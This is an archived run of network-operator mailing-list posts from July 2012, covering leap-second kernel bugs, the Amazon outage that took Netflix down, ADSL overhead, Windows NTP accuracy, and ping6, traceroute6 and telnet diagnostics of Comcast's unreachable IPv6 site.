From r.engehausen at gmail.com Sun Jul 1 00:03:16 2012 From: r.engehausen at gmail.com (Roy) Date: Sat, 30 Jun 2012 22:03:16 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FEFD4F5.5090306@derekivey.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> Message-ID: <4FEFDA14.7070403@gmail.com> Talk about people not testing things, leap seconds have been around since 1961. There have been nine leap seconds in the last twenty years. Any system that can't handle a leap second is seriously flawed. From rsk at gsp.org Sun Jul 1 05:40:50 2012 From: rsk at gsp.org (Rich Kulawiec) Date: Sun, 1 Jul 2012 06:40:50 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: <20120701104050.GA20597@gsp.org> A useful explanation may be found here: http://blogs.discovermagazine.com/badastronomy/2012/06/30/wait-just-a-second-no-really-wait-just-a-second/ ---rsk From jim at reptiles.org Sun Jul 1 09:05:54 2012 From: jim at reptiles.org (Jim Mercer) Date: Sun, 1 Jul 2012 10:05:54 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FEFB944.2010006@paulgraydon.co.uk> References: <4FEFB944.2010006@paulgraydon.co.uk> Message-ID: <20120701140554.GA49593@reptiles.org> On Sat, Jun 30, 2012 at 04:43:16PM -1000, Paul Graydon wrote: > On 6/30/2012 3:16 PM, Paul WALL wrote: > > Comments? > > Not very well if you have a modern box (RHES/CentOS 6) and Java apps > running on them. RHES/CentOS 5 merrily ignored it. Worse, just > bouncing the Java stack didn't fix it, it required the box to be > rebooted. i didn't reboot: /etc/init.d/ntp stop date `date +"%m%d%H%M%C%y.%S"` /etc/init.d/ntp start seems to calm things right back to normal. --jim -- Jim Mercer Reptilian Research jim at reptiles.org +1 416 410-5633 "He who dies with the most toys is nonetheless dead" From gbonser at seven.com Sun Jul 1 11:44:43 2012 From: gbonser at seven.com (George Bonser) Date: Sun, 1 Jul 2012 16:44:43 +0000 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FEFDA14.7070403@gmail.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> > -----Original Message----- > From: Roy > Sent: Saturday, June 30, 2012 10:03 PM > To: nanog at nanog.org > Subject: Re: F-ckin Leap Seconds, how do they work? > > > Talk about people not testing things, leap seconds have been around > since 1961. There have been nine leap seconds in the last twenty > years. Any system that can't handle a leap second is seriously flawed. > Roy, this was a problem in only certain kernel versions. Unfortunately the range of versions affected are pretty widely deployed right now. Earlier and later versions did not have the problem. From jra at baylink.com Sun Jul 1 11:52:09 2012 From: jra at baylink.com (Jay Ashworth) Date: Sun, 1 Jul 2012 12:52:09 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <201207010213.q612DAbR009810@mail.r-bonomi.com> Message-ID: <23258236.11872.1341161529019.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Robert Bonomi" > > Subject: F-ckin Leap Seconds, how do they work? > > > > Comments? > > Addressing the Subject question, _as_asked_ -- "Very well". > > *SNORT* Yes. But I'm sure the reference was to the Insane Clown Posse spawned meme, which rapidly became popular with liberals, dissing the apparentl distaste of conservatives for the scientific method: http://knowyourmeme.com/memes/fcking-magnets-how-do-they-work Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jra at baylink.com Sun Jul 1 13:36:57 2012 From: jra at baylink.com (Jay Ashworth) Date: Sun, 1 Jul 2012 14:36:57 -0400 (EDT) Subject: It's the end of the world, as we know it (Was: FYI Netflix is down) In-Reply-To: Message-ID: <24841582.11882.1341167817217.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "jamie rishaw" > you know what's happening even more? > > ..Amazon not learning their lesson. > Please stop these crappy practices, people. Do real world DR testing. > Play "What If This City Dropped Off The Map" games, because tonight, > parts of VA infact did. You know what I want everyone to do? Go read this. Right now; it's Sunday, and I'll wait: http://interdictor.livejournal.com/2005/08/27/ Start there, and click Next Date a lot, until you get to the end. Entire metropolitan areas can, and do, fall completely off the map. If your audience is larger than that area, then you need to prepare for it. And being reminded of how big it can get is occasionally necessary. The 4ESS in the third subbasement of 1WTC that was a toll switch for most of the northeast reportedly stayed on the air, talking to it's SS7 neighbors, until something like 1500EDT, 11 Sep 2001. It can get *really* big. Are you ready? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jra at baylink.com Sun Jul 1 13:38:57 2012 From: jra at baylink.com (Jay Ashworth) Date: Sun, 1 Jul 2012 14:38:57 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: Message-ID: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Tyler Haske" > How to run a datacenter 101. Have more then one location, preferably > far apart. It being Amazon I would expect more. :/ Not entirely. Datacenters do go down, our best efforts to the contrary notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only the tools to provide it yourself. 25% Amazon; 75% service provider clients; that's my appraisal of the blame. Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jwbensley at gmail.com Sun Jul 1 14:01:26 2012 From: jwbensley at gmail.com (James Bensley) Date: Sun, 1 Jul 2012 20:01:26 +0100 Subject: How do the lowest layers of the DSL stack work? Message-ID: Hi list, I am hoping someone here can explain to me (or point to an article that does) what is happening at the lower layers of an ADSL connection. This is an excerpt from the wiki page on ADSL (ANSI T1.413 Issue 2); "Up to 254 sub-carriers are used downstream; each of these 254 sub-carriers can support the modulation of 0 to 15 bits per baud. The baud rate is 4,000 symbols per second on each subcarrier. Thus the maximum theoretical downstream data rate of an ADSL system is 15.24 Mbit/s (254?15?4000). However, because the data is split up into packets (actually Reed?Solomon encoded codewords) of 255 bytes, the maximum achievable downstream data rate is 8.128 Mbit/s (including other overheads)." That is quite a drop in speed and I'm trying to understand where this is happening. Assuming a typical PPPoA set up, the ATM frames are 48 bytes of data payload and 5 header bytes, to make a total frame size of 53 bytes. Somewhere between the physical transfer rate at the bottom of the stack and this ATM layer, we are consuming all that bandwidth with other non-user data. Where is it going? According to that extract, it all disappeared because of RS encoding, which is hugely vague. Are ATM frames those used as the 68 data frames in a superframe? I understand that Reed-Solomon is splitting data into 255 byte codewords because an 8-bit symbol sized has been imposed to give a 32 byte parity block; Is the superframe where RS encoding is applied? If so, I don't understand how that consumes as much overhead as this statement claims. Could someone enlighten me as to what I'm missing between the ATM layer and the wire rate. Kind regards, James. From paul4004 at gmail.com Sun Jul 1 14:03:13 2012 From: paul4004 at gmail.com (PC) Date: Sun, 1 Jul 2012 13:03:13 -0600 Subject: [c-nsp] NTP Servers In-Reply-To: References: <8C6A44F7-FBC7-4F42-9830-22572A96FF3C@puck.nether.net> <7447aaf43870fd4fb89ebc21c0752320@mail.dessus.com> Message-ID: Many folks have more than just windows desktop PCs syncing their time. If your application requires sub-5 second accuracy, (such as end of a banking day), then Windows NTP is unsuitable for the purpose. If your only objective is to sync the times on a bunch of user laptops so they can get Kerbeos tickets within the 5 minute tolerance, it works fine. For me, even a few seconds apart can be frustrating for comparing log files between busy devices. Your reason would be whether or not you fall inside or outside the Microsoft guidelines below: >From Microsoft: http://support.microsoft.com/kb/939322 We do not guarantee and we do not support the accuracy of the W32Time service between nodes on a network. The W32Time service is not a full-featured NTP solution that meets time-sensitive application needs. The W32Time service is primarily designed to do the following: - Make the Kerberos version 5 authentication protocol work. - Provide loose sync time for client computers. The W32Time service cannot reliably maintain sync time to the range of 1 to 2 seconds. Such tolerances are outside the design specification of the W32Time service. On Sat, Jun 30, 2012 at 5:23 PM, Jimmy Hess wrote: > On 6/30/12, Grant Ridder wrote: > > I don't understand why anyone would use windows server for anything that > > needed precision like time. > > Probably because they realize that in a Windows domain, their domain > controllers already provide a SNTP service with the Windows NT PDC > Emulator providing authoritative time for windows time service, and > all those windows servers can be enabled as a NTP server with a small > configuration change, and Windows Domain clients are required to > be synchronized with this using the Windows time service, as a > condition for Kerberos authentication and domain logon, for the > configuration to be a supported one. > > So, given you already have those capabilities and those constraints... > how do you justify deploying another server for providing a separate > time service, running a new OS, instead of just using the same one > for all hosts? > > In many cases it's not "Why use a windows time server" that has to > be justified; > the burden of proof is to answer the question "What can you say that > indicates you should definitely not use a windows time server for the > application?" :) > > -- > -JH > > From derek at derekivey.com Sun Jul 1 18:28:02 2012 From: derek at derekivey.com (Derek Ivey) Date: Sun, 01 Jul 2012 19:28:02 -0400 Subject: Comcast's IPv6 Information Site Unreachable Message-ID: <4FF0DD02.1050007@derekivey.com> Anyone else having trouble getting to Comcast's IPv6 Information site? It appears to be unreachable over IPv6. [root at server ~]# ping6 comcast6.net PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited ^C --- comcast6.net ping statistics --- 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms [root at server ~]# traceroute6 comcast6.net traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 ms 29.144 ms 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms 28.936 ms 28.097 ms 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) 28.059 ms 31.771 ms 57.135 ms 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) 81.571 ms 81.507 ms 81.569 ms 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 ms 103.962 ms 104.068 ms 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms !X 104.597 ms !X 104.999 ms !X Thanks, Derek From sadiq at asininetech.com Sun Jul 1 18:37:54 2012 From: sadiq at asininetech.com (Sadiq Saif) Date: Sun, 1 Jul 2012 19:37:54 -0400 Subject: Comcast's IPv6 Information Site Unreachable In-Reply-To: <4FF0DD02.1050007@derekivey.com> References: <4FF0DD02.1050007@derekivey.com> Message-ID: Website is reachable here via my HE tunnel. Pings are not going through though as you showed. On Sun, Jul 1, 2012 at 7:28 PM, Derek Ivey wrote: > Anyone else having trouble getting to Comcast's IPv6 Information site? It > appears to be unreachable over IPv6. > > [root at server ~]# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data > bytes > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination > unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination > unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination > unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination > unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination > unreachable: Administratively prohibited > ^C > --- comcast6.net ping statistics --- > 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms > > [root at server ~]# traceroute6 comcast6.net > traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 > byte packets > 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms > 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms > 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 ms > 29.144 ms > 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms > 28.936 ms 28.097 ms > 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) > 28.059 ms 31.771 ms 57.135 ms > 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms 2001:559::31d > (2001:559::31d) 29.041 ms 29.060 ms > 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1) > 32.553 ms 19.810 ms 16.526 ms > 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms > 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms > 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) > 81.571 ms 81.507 ms 81.569 ms > 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms > 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms > 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 ms > 103.962 ms 104.068 ms > 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms !X > 104.597 ms !X 104.999 ms !X > > Thanks, > Derek > -- Sadiq S O< ascii ribbon campaign - stop html mail - www.asciiribbon.org From frnkblk at iname.com Sun Jul 1 20:35:24 2012 From: frnkblk at iname.com (Frank Bulk) Date: Sun, 1 Jul 2012 20:35:24 -0500 Subject: Comcast's IPv6 Information Site Unreachable In-Reply-To: <4FF0DD02.1050007@derekivey.com> References: <4FF0DD02.1050007@derekivey.com> Message-ID: <000201cd57f2$f3973e90$dac5bbb0$@iname.com> ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012. But their site loads fine over port 80. Frank -----Original Message----- From: Derek Ivey [mailto:derek at derekivey.com] Sent: Sunday, July 01, 2012 6:28 PM To: nanog at nanog.org Subject: Comcast's IPv6 Information Site Unreachable Anyone else having trouble getting to Comcast's IPv6 Information site? It appears to be unreachable over IPv6. [root at server ~]# ping6 comcast6.net PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited ^C --- comcast6.net ping statistics --- 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms [root at server ~]# traceroute6 comcast6.net traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 ms 29.144 ms 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms 28.936 ms 28.097 ms 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) 28.059 ms 31.771 ms 57.135 ms 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) 81.571 ms 81.507 ms 81.569 ms 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 ms 103.962 ms 104.068 ms 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms !X 104.597 ms !X 104.999 ms !X Thanks, Derek From derek at derekivey.com Sun Jul 1 20:44:40 2012 From: derek at derekivey.com (Derek Ivey) Date: Sun, 01 Jul 2012 21:44:40 -0400 Subject: Comcast's IPv6 Information Site Unreachable In-Reply-To: <000201cd57f2$f3973e90$dac5bbb0$@iname.com> References: <4FF0DD02.1050007@derekivey.com> <000201cd57f2$f3973e90$dac5bbb0$@iname.com> Message-ID: <4FF0FD08.8050706@derekivey.com> Thanks for the input guys! Sounds like it might be an issue with my tunnel then. I had problems getting to a few sites last week (http://www.dslreports.com/forum/r27265527-IPV6-Issues-Facebook-and-Engadget) and HE resolved the issue pretty quickly. I will ask them if they are aware of it. Thanks, Derek On 7/1/2012 9:35 PM, Frank Bulk wrote: > ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012. > But their site loads fine over port 80. > > Frank > > -----Original Message----- > From: Derek Ivey [mailto:derek at derekivey.com] > Sent: Sunday, July 01, 2012 6:28 PM > To: nanog at nanog.org > Subject: Comcast's IPv6 Information Site Unreachable > > Anyone else having trouble getting to Comcast's IPv6 Information site? > It appears to be unreachable over IPv6. > > [root at server ~]# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 > data bytes > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 > Destination unreachable: Administratively prohibited > ^C > --- comcast6.net ping statistics --- > 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms > > [root at server ~]# traceroute6 comcast6.net > traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops > max, 40 byte packets > 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms > 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms > 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 > ms 29.144 ms > 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms > 28.936 ms 28.097 ms > 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) > 28.059 ms 31.771 ms 57.135 ms > 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms > 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms > 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net > (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms > 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms > 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms > 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) > 81.571 ms 81.507 ms 81.569 ms > 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms > 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms > 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 > ms 103.962 ms 104.068 ms > 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms > !X 104.597 ms !X 104.999 ms !X > > Thanks, > Derek > > > From mysidia at gmail.com Sun Jul 1 20:59:42 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sun, 1 Jul 2012 20:59:42 -0500 Subject: [c-nsp] NTP Servers In-Reply-To: References: <8C6A44F7-FBC7-4F42-9830-22572A96FF3C@puck.nether.net> <7447aaf43870fd4fb89ebc21c0752320@mail.dessus.com> Message-ID: On 7/1/12, PC wrote: > If your application requires sub-5 second accuracy, (such as end of a > banking day), then Windows NTP is unsuitable for the purpose. Looks like CYA on Microsoft's part. That i've seen, Windows NTP in physical environments with a hardware system clock not having issues consistently provides accuracy better than +/- 0.5 against the time source it's synced with, but in virtual environments, which have incompatibilities with high sub-second RTC accuracy in the first place, neither Windows nor Unix NTP services are able to provide that consistently without much tinkering. If it's absolutely critical that you have sub-5 second accuracy, even Unix NTP is not to be considered good enough, you need highly accurate hardware time source, something more accurate than the usual system clock you find in a PC or server. Unix NTP can only do so much to correct for a broken system clock; although it does do a very good job disciplining PC real-time clocks that consistently run a bit too fast or too slow, ultimately the personal computer clocks can at times be unreliable.... If they were perfect, you wouldn't need time sync in the first place; just set them once, and correct the annual 0.01 seconds worth of error once a year.... -- -JH From mysidia at gmail.com Sun Jul 1 21:20:11 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sun, 1 Jul 2012 21:20:11 -0500 Subject: Comcast's IPv6 Information Site Unreachable In-Reply-To: <4FF0DD02.1050007@derekivey.com> References: <4FF0DD02.1050007@derekivey.com> Message-ID: On 7/1/12, Derek Ivey wrote: > Anyone else having trouble getting to Comcast's IPv6 Information site? > It appears to be unreachable over IPv6. Looks like just ICMP that's broken. ~# telnet comcast6.net 80 Trying 2001:558:fe23:2:69:252:208:135... Connected to comcast6.net (2001:558:fe23:2:69:252:208:135). Escape character is '^]'. HEAD / HTTP/1.1 Host: comcast6.net User-Agent: Telnet HTTP/1.1 200 OK Date: Mon, 02 Jul 2012 02:21:33 GMT Server: Apache/2.2.15 (Red Hat) X-Powered-By: PHP/5.3.3 Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Cache-Control: no-cache Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Connection closed by foreign host. ~# ping6 comcast6.net PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 Destination unreachable: Administratively prohibited >From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 Destination unreachable: Administratively prohibited --- comcast6.net ping statistics --- 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms From steve at pirk.com Sun Jul 1 21:38:16 2012 From: steve at pirk.com (steve pirk [egrep]) Date: Sun, 1 Jul 2012 19:38:16 -0700 Subject: FYI Netflix is down In-Reply-To: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com> References: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com> Message-ID: On Sun, Jul 1, 2012 at 11:38 AM, Jay Ashworth wrote: > Not entirely. Datacenters do go down, our best efforts to the contrary > notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only > the tools to provide it yourself. 25% Amazon; 75% service provider > clients; > that's my appraisal of the blame. > >From a Wired article: > That?s what was supposed to happen at Netflix Friday night. But it didn?t > work out that way. According to Twitter messages from Netflix Director of > Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick Branson, it > looks like an Amazon Elastic Load Balancing service, designed to spread > Netflix?s processing loads across data centers, failed during the outage. > Without that ELB service working properly, the Netflix and Pintrest > services hosted by Amazon crashed. http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ The GSLB fail-over that was supposed to take place for the affected services (that had configured their applications to fail-over) failed. I heard about this the day after Google announced the Compute Engine addition to the App Engine product lines they have. The demo was awesome. I imagine Google has GSLB down pat by now, so some companies might start looking... ;-] --steve From derek at derekivey.com Sun Jul 1 21:45:51 2012 From: derek at derekivey.com (Derek Ivey) Date: Sun, 01 Jul 2012 22:45:51 -0400 Subject: Comcast's IPv6 Information Site Unreachable In-Reply-To: References: <4FF0DD02.1050007@derekivey.com> Message-ID: <4FF10B5F.2090205@derekivey.com> Someone replied to my DSL Reports thread: http://www.dslreports.com/forum/r27289866- Apparently there is an ACL issue with their load balancer that is blocking ICMP and causing PMTU issues for people who use tunnels. http://www.dslreports.com/forum/r27226136- It looks like it's been going on since June 11. It's strange that Comcast hasn't resolved the issue by now. Thanks, Derek On 7/1/2012 10:20 PM, Jimmy Hess wrote: > On 7/1/12, Derek Ivey wrote: >> Anyone else having trouble getting to Comcast's IPv6 Information site? >> It appears to be unreachable over IPv6. > Looks like just ICMP that's broken. > > ~# telnet comcast6.net 80 > Trying 2001:558:fe23:2:69:252:208:135... > Connected to comcast6.net (2001:558:fe23:2:69:252:208:135). > Escape character is '^]'. > HEAD / HTTP/1.1 > Host: comcast6.net > User-Agent: Telnet > > HTTP/1.1 200 OK > Date: Mon, 02 Jul 2012 02:21:33 GMT > Server: Apache/2.2.15 (Red Hat) > X-Powered-By: PHP/5.3.3 > Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ > P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" > Cache-Control: no-cache > Pragma: no-cache > Connection: close > Content-Type: text/html; charset=utf-8 > > Connection closed by foreign host. > > > > ~# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) > 56 data bytes > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 > Destination unreachable: Administratively prohibited > > --- comcast6.net ping statistics --- > 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms From John_Brzozowski at Cable.Comcast.com Mon Jul 2 